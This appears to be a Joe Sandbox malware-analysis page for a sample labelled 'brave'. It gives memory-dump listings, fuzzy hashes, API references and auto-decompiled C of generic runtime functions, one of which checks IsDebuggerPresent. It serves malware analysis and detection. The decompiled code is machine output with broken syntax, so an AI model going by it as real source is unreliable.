Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$DeleteEnter$CloseHandle$ReleaseSemaphorefree
String ID:
API String ID: 897415695-0
Opcode ID: a0b6630a7d97047e0030e229e683856c82cc15d2976108efe7bffb770ea2e6fd
Instruction ID: 686cb12624693318723586d6799406ce8bab873f3f0d5f85db661877bfc2ebf0
Opcode Fuzzy Hash: a0b6630a7d97047e0030e229e683856c82cc15d2976108efe7bffb770ea2e6fd
Instruction Fuzzy Hash: CA512621A08E4682EB509B269C987BA2794BF56B9CF4C8635DD9DE33D1CFBCE441D301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B38BA0 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

calloc.MSVCRT(?,00007FF652DE1400,00000000,00007FF652B37B97,?,?,?,00007FF652B37CC5,?,?,?,?,00007FF652B37E65,?,00007FF652DE1400), ref: 00007FF652B38BCC
CreateSemaphoreA.KERNEL32 ref: 00007FF652B38C0C
CreateSemaphoreA.KERNEL32 ref: 00007FF652B38C23
InitializeCriticalSection.KERNEL32(?,00007FF652DE1400,00000000,00007FF652B37B97,?,?,?,00007FF652B37CC5,?,?,?,?,00007FF652B37E65,?,00007FF652DE1400), ref: 00007FF652B38C4B
InitializeCriticalSection.KERNEL32(?,00007FF652DE1400,00000000,00007FF652B37B97,?,?,?,00007FF652B37CC5,?,?,?,?,00007FF652B37E65,?,00007FF652DE1400), ref: 00007FF652B38C52
InitializeCriticalSection.KERNEL32(?,00007FF652DE1400,00000000,00007FF652B37B97,?,?,?,00007FF652B37CC5,?,?,?,?,00007FF652B37E65,?,00007FF652DE1400), ref: 00007FF652B38C59

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID:
API String ID: 2075313795-0
Opcode ID: 7c892f574ebb44d14683540b960821f729198a1c4daf112854c0d4a023215e6b
Instruction ID: df27fa1125dd9cb5baa80e57b8ffdee313889cec505dbe3dcfebcd70ab4acdfc
Opcode Fuzzy Hash: 7c892f574ebb44d14683540b960821f729198a1c4daf112854c0d4a023215e6b
Instruction Fuzzy Hash: 3A21CE32F0671286FB55DB25EC18BAA2694FF5639CF484136CA1C973C0EEBC9885C301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E650 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00007FF67FF652B2E650(void* __ebx, long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
				void* _v32;
				intOrPtr _v108;
				void* _v144;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t26;
				intOrPtr _t42;
				long long _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				long long _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed long long _t55;
				long long _t59;
				intOrPtr _t64;
				struct _MEMORY_BASIC_INFORMATION* _t67;
				intOrPtr _t76;
				long long _t80;

				_t26 = __ebx;
				_t44 =  &_a16;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_v32 = _t44;
				_t20 = E00007FF67FF652B41D50(_t19, 2, _t44, __rcx);
				r8d = 0x1b;
				0x52b416c8(_t51);
				_t52 = _v32;
				E00007FF67FF652B41D50(_t20, 2, _t44, "Mingw-w64 runtime failure:\n");
				_t59 = _t44;
				0x52b41648();
				0x52b41710();
				asm("o16 nop [eax+eax]");
				_t80 = _t59;
				if (_t26 <= 0) goto 0x52b2e7f0;
				_t45 =  *0x52de10f8; // 0x38d23ffb00
				_t46 = _t45 + 0x18;
				asm("o16 nop [eax+eax]");
				_t64 =  *_t46;
				if (_t64 - _t80 > 0) goto 0x52b2e70c;
				_t76 =  *((intOrPtr*)(_t46 + 8));
				r8d =  *((intOrPtr*)(_t76 + 8));
				if (_t80 - _t64 + _t76 < 0) goto 0x52b2e793;
				_t47 = _t46 + 0x28;
				if (1 != _t26) goto 0x52b2e6f0;
				_t22 = E00007FF67FF652B2F3C0();
				if (_t47 == 0) goto 0x52b2e812;
				_t48 =  *0x52de10f8; // 0x38d23ffb00
				_t55 =  *0x52de10f4 +  *0x52de10f4 * 4 << 3;
				_t49 = _t48 + _t55;
				 *((long long*)(_t49 + 0x20)) = _t47;
				 *_t49 = 0;
				E00007FF67FF652B2F4F0(_t22, _t76);
				r8d = 0x30;
				_t50 =  *0x52de10f8; // 0x38d23ffb00
				 *((long long*)(_t50 + _t55 + 0x18)) = _t80 + _t49;
				VirtualQuery(_t52, _t67, __rcx);
				_t42 = _t50;
				if (_t42 == 0) goto 0x52b2e7f7;
				if (_t42 == 0) goto 0x52b2e78c;
				if (_t42 != 0) goto 0x52b2e7a0;
				 *0x52de10f4 =  *0x52de10f4 + 1;
				return _v108;
			}

0x7ff652b2e650
0x7ff652b2e65a
0x7ff652b2e664
0x7ff652b2e669
0x7ff652b2e66e
0x7ff652b2e673
0x7ff652b2e678
0x7ff652b2e67d
0x7ff652b2e692
0x7ff652b2e697
0x7ff652b2e6a1
0x7ff652b2e6a9
0x7ff652b2e6af
0x7ff652b2e6b4
0x7ff652b2e6ba
0x7ff652b2e6cf
0x7ff652b2e6d4
0x7ff652b2e6da
0x7ff652b2e6e3
0x7ff652b2e6e7
0x7ff652b2e6f0
0x7ff652b2e6f6
0x7ff652b2e6f8
0x7ff652b2e6fc
0x7ff652b2e706
0x7ff652b2e70f
0x7ff652b2e715
0x7ff652b2e71a
0x7ff652b2e725
0x7ff652b2e72b
0x7ff652b2e736
0x7ff652b2e73a
0x7ff652b2e73d
0x7ff652b2e741
0x7ff652b2e747
0x7ff652b2e754
0x7ff652b2e75d
0x7ff652b2e764
0x7ff652b2e769
0x7ff652b2e76f
0x7ff652b2e772
0x7ff652b2e782
0x7ff652b2e78a
0x7ff652b2e78c
0x7ff652b2e79b

APIs

VirtualQuery.KERNEL32 ref: 00007FF652B2E769

Strings

Mingw-w64 runtime failure:, xrefs: 00007FF652B2E688
Address %p has no image-section, xrefs: 00007FF652B2E6C0, 00007FF652B2E815
VirtualProtect failed with code 0x%x, xrefs: 00007FF652B2E7DE
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF652B2E801

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 132a4c11c153de298ffea9ed1bdabd017d4d66a2df506e748bccd0aa60d22546
Instruction ID: 1e9c8c440033d2b163d961ccd9b572474e3106f62b405dd8778a4e74284efbe4
Opcode Fuzzy Hash: 132a4c11c153de298ffea9ed1bdabd017d4d66a2df506e748bccd0aa60d22546
Instruction Fuzzy Hash: 63518EB2B09B4281EB109F16EC416A97760FB4AB9CF4C4235DE4DA73A5EEBCE445C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B3CD30 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122COMMON

Download Yara Rule

Strings

%*.*s, xrefs: 00007FF652B3CE75
%-*.*s, xrefs: 00007FF652B3CEC6
%.*s, xrefs: 00007FF652B3CEB8

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s
API String ID: 0-4054516066
Opcode ID: 3b4b1a4249cd6db309c4553ff8de0bac3b9e23fda156ad8bb14e5570f57846da
Instruction ID: e1c39fcdf71e4f92d115f2ccf9992a7fb538dabdcd4deae7420bd87469e93831
Opcode Fuzzy Hash: 3b4b1a4249cd6db309c4553ff8de0bac3b9e23fda156ad8bb14e5570f57846da
Instruction Fuzzy Hash: 525173B3E1825287E7608F65D94077976E1FB56B9CF288235DA08DB688CE7DF8008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B3C900 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00007FF67FF652B3C900(void* __edx, void* __rax, void* __rcx, void* __r8) {
				signed int _v72;
				char _v80;
				intOrPtr _t19;
				intOrPtr _t28;
				void* _t40;
				void* _t48;
				void* _t52;
				void* _t53;
				char* _t62;

				_t52 = __rax;
				_t19 =  *((intOrPtr*)(__r8 + 0x10));
				_t53 = __r8;
				if (_t19 < 0) goto 0x52b3c91f;
				_t40 =  >  ? _t19 : __edx;
				r8d =  *((intOrPtr*)(__r8 + 0xc));
				if (( *(__r8 + 8) & 0x00006000) == 0x6000) goto 0x52b3ca28;
				if (_t40 - r8d < 0) goto 0x52b3c9c0;
				 *((intOrPtr*)(__r8 + 0xc)) = 0xffffffff;
				if (_t40 > 0) goto 0x52b3c97b;
				goto 0x52b3ca0d;
				_t62 = __rcx + __rax;
				E00007FF67FF652B3C8A0(_v72 & 0xffff, __r8);
				if (_t40 == 0) goto 0x52b3ca0d;
				_v80 = 0;
				strlen(??);
				E00007FF67FF652B41940( &_v72, _t62, _t52,  &_v80);
				_t48 = _t52;
				if (_t48 == 0) goto 0x52b3ca0d;
				if (_t48 >= 0) goto 0x52b3c960;
				_v72 =  *_t62;
				goto 0x52b3c965;
				asm("o16 nop [cs:eax+eax]");
				r8d = r8d - _t40 - 1;
				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
				if (0 != 0) goto 0x52b3c94a;
				r8d = r8d - 1;
				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
				E00007FF67FF652B3C8A0(0x20, _t53);
				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
				if ( *((intOrPtr*)(_t53 + 0xc)) != 0) goto 0x52b3c9e0;
				goto 0x52b3c94a;
				E00007FF67FF652B3C8A0(0x20, _t53);
				_t28 =  *((intOrPtr*)(_t53 + 0xc));
				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
				if (_t28 > 0) goto 0x52b3ca00;
				return _t28;
			}

0x7ff652b3c900
0x7ff652b3c90a
0x7ff652b3c913
0x7ff652b3c918
0x7ff652b3c91c
0x7ff652b3c922
0x7ff652b3c934
0x7ff652b3c93d
0x7ff652b3c943
0x7ff652b3c956
0x7ff652b3c958
0x7ff652b3c96b
0x7ff652b3c96e
0x7ff652b3c975
0x7ff652b3c97e
0x7ff652b3c989
0x7ff652b3c99a
0x7ff652b3c99f
0x7ff652b3c9a2
0x7ff652b3c9a4
0x7ff652b3c9af
0x7ff652b3c9b4
0x7ff652b3c9b6
0x7ff652b3c9c0
0x7ff652b3c9c3
0x7ff652b3c9ca
0x7ff652b3c9d0
0x7ff652b3c9d4
0x7ff652b3c9e8
0x7ff652b3c9f3
0x7ff652b3c9f8
0x7ff652b3c9fa
0x7ff652b3ca08
0x7ff652b3ca0d
0x7ff652b3ca13
0x7ff652b3ca18
0x7ff652b3ca24

Strings

%.*S, xrefs: 00007FF652B3CA68
%-*.*S, xrefs: 00007FF652B3CA76
%*.*S, xrefs: 00007FF652B3CA3D

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %*.*S$%-*.*S$%.*S
API String ID: 0-2115465065
Opcode ID: 7168d2604b3189bc1086008fb78c7252569c5abbf682eefe2c3ff4568daf00a2
Instruction ID: 0b8e03442d2c101b703d1eb08be8b8232cf4618436c4407c0682f494f45b7251
Opcode Fuzzy Hash: 7168d2604b3189bc1086008fb78c7252569c5abbf682eefe2c3ff4568daf00a2
Instruction Fuzzy Hash: 2A41D373F1865247E7508A69AC007796691BB96BACF6CC230DE5CD77C9DE7DE4408B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B36EE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 35
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B36EE0(void* __rcx) {
				long _t1;

				_t1 = GetLastError();
				if (_t1 != 0) goto 0x52b36f00;
				return _t1;
			}

0x7ff652b36eea
0x7ff652b36ef2
0x7ff652b36efb

APIs

GetLastError.KERNEL32 ref: 00007FF652B36EEA
FormatMessageA.KERNEL32 ref: 00007FF652B36F2B
IsDebuggerPresent.KERNEL32 ref: 00007FF652B36F35

Strings

aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaAaAAaAAAAaaaaAaAaaaaaaaaa, xrefs: 00007FF652B36EE2

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID: aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaAaAAaAAAAaaaaAaAaaaaaaaaa
API String ID: 2392558662-3028198290
Opcode ID: fd52d147f527fa6bcd06c01c60e71c22fdd217dc7770cd6842f4e7a378731cf7
Instruction ID: f18e43bfcb57485f9b32332c93b96c8333b27c3b82ceda5854cdf05bac18c66e
Opcode Fuzzy Hash: fd52d147f527fa6bcd06c01c60e71c22fdd217dc7770cd6842f4e7a378731cf7
Instruction Fuzzy Hash: 81013161A1CA4682E7509B25FC6873973A0BF99B8CF5C0234DA4DD6A64EFBCD484C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B445C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 215stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF652B445E9
memcmp.MSVCRT ref: 00007FF652B44608
memcmp.MSVCRT ref: 00007FF652B44696
memcmp.MSVCRT ref: 00007FF652B44718

Part of subcall function 00007FF652B51250: strlen.MSVCRT ref: 00007FF652B5126E

memcmp.MSVCRT ref: 00007FF652B447C4

Strings

basic_string::compare, xrefs: 00007FF652B44642, 00007FF652B446CC, 00007FF652B4474E, 00007FF652B447FA, 00007FF652B44813
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B44649, 00007FF652B446D3, 00007FF652B44755, 00007FF652B44801, 00007FF652B4481A

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 68f9f2bcd5ab65c1f543f9db557d2865906ff8277c6dcd0d61bc8145445e6c47
Instruction ID: f8d708743f6d2dd4d8262c252729e881802998f88be585ff2684e9ddc82c0bf7
Opcode Fuzzy Hash: 68f9f2bcd5ab65c1f543f9db557d2865906ff8277c6dcd0d61bc8145445e6c47
Instruction Fuzzy Hash: FF5109A2F1498241FE119A26DD802E812A29F07BECF5C4731DE6CE77D5FDACD9828700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B45670 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 202stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF652B45699
memcmp.MSVCRT ref: 00007FF652B456BA
memcmp.MSVCRT ref: 00007FF652B45746
memcmp.MSVCRT ref: 00007FF652B457C5

Part of subcall function 00007FF652B51250: strlen.MSVCRT ref: 00007FF652B5126E

memcmp.MSVCRT ref: 00007FF652B45861

Strings

basic_string::compare, xrefs: 00007FF652B456F4, 00007FF652B4577C, 00007FF652B457FB, 00007FF652B45897, 00007FF652B458B0
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B456FB, 00007FF652B45783, 00007FF652B45802, 00007FF652B4589E, 00007FF652B458B7

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 59c97ae42c308dfeb0f959f2ed3afa6849da74c1a26816688b8ea568bade8b86
Instruction ID: e8f71c6f44fc091318ea59fead87c9e9db311e34a4bd76fee50f38fd2d4995ed
Opcode Fuzzy Hash: 59c97ae42c308dfeb0f959f2ed3afa6849da74c1a26816688b8ea568bade8b86
Instruction Fuzzy Hash: 9A51CB62F1598681FE109A26ED402E453819F16BECF5C4332EE6CE77D5EDDCEA868700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4D020 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B4D020(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
				signed int _t6;
				long long _t15;
				long long _t17;
				signed char* _t18;

				_t17 =  *((intOrPtr*)(__rdx + 8));
				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				_t18 =  *((intOrPtr*)(__rdx));
				if (__eflags == 0) goto 0x52b4d046;
				if (_t18 == 0) goto 0x52b4d0b2;
				if (_t17 - 0xf > 0) goto 0x52b4d080;
				if (_t17 != 1) goto 0x52b4d070;
				_t6 =  *_t18 & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = _t17;
				 *((char*)(_t15 + _t17)) = 0;
				return _t6;
			}

0x7ff652b4d028
0x7ff652b4d02f
0x7ff652b4d033
0x7ff652b4d036
0x7ff652b4d03f
0x7ff652b4d044
0x7ff652b4d04a
0x7ff652b4d050
0x7ff652b4d052
0x7ff652b4d057
0x7ff652b4d05a
0x7ff652b4d05e
0x7ff652b4d06a

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B4D195, 00007FF652B4D1EF, 00007FF652B4D23F
basic_string::_M_create, xrefs: 00007FF652B4D0BE, 00007FF652B4D152
basic_string::_M_construct null not valid, xrefs: 00007FF652B4D0B2
string::string, xrefs: 00007FF652B4D238
basic_string::basic_string, xrefs: 00007FF652B4D18E, 00007FF652B4D1E8

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: e3e8cbf4f69290a6b3de281f3e3b3e56b2d6e49d707012ad7580e136db3a3009
Instruction ID: ef26faac449636e601ac09ddebac7fa961322eb560b0495799fc9e312837a205
Opcode Fuzzy Hash: e3e8cbf4f69290a6b3de281f3e3b3e56b2d6e49d707012ad7580e136db3a3009
Instruction Fuzzy Hash: 5251E972F05B4684EB109B25DC901B86365F71AF9CF9C4632CA9CA7381EEBCE592C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B4D5D0 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B4D5D0(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
				signed int _t6;
				long long _t15;
				long long _t17;
				signed char* _t18;

				_t17 =  *((intOrPtr*)(__rdx + 8));
				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				_t18 =  *((intOrPtr*)(__rdx));
				if (__eflags == 0) goto 0x52b4d5f6;
				if (_t18 == 0) goto 0x52b4d662;
				if (_t17 - 0xf > 0) goto 0x52b4d630;
				if (_t17 != 1) goto 0x52b4d620;
				_t6 =  *_t18 & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = _t17;
				 *((char*)(_t15 + _t17)) = 0;
				return _t6;
			}

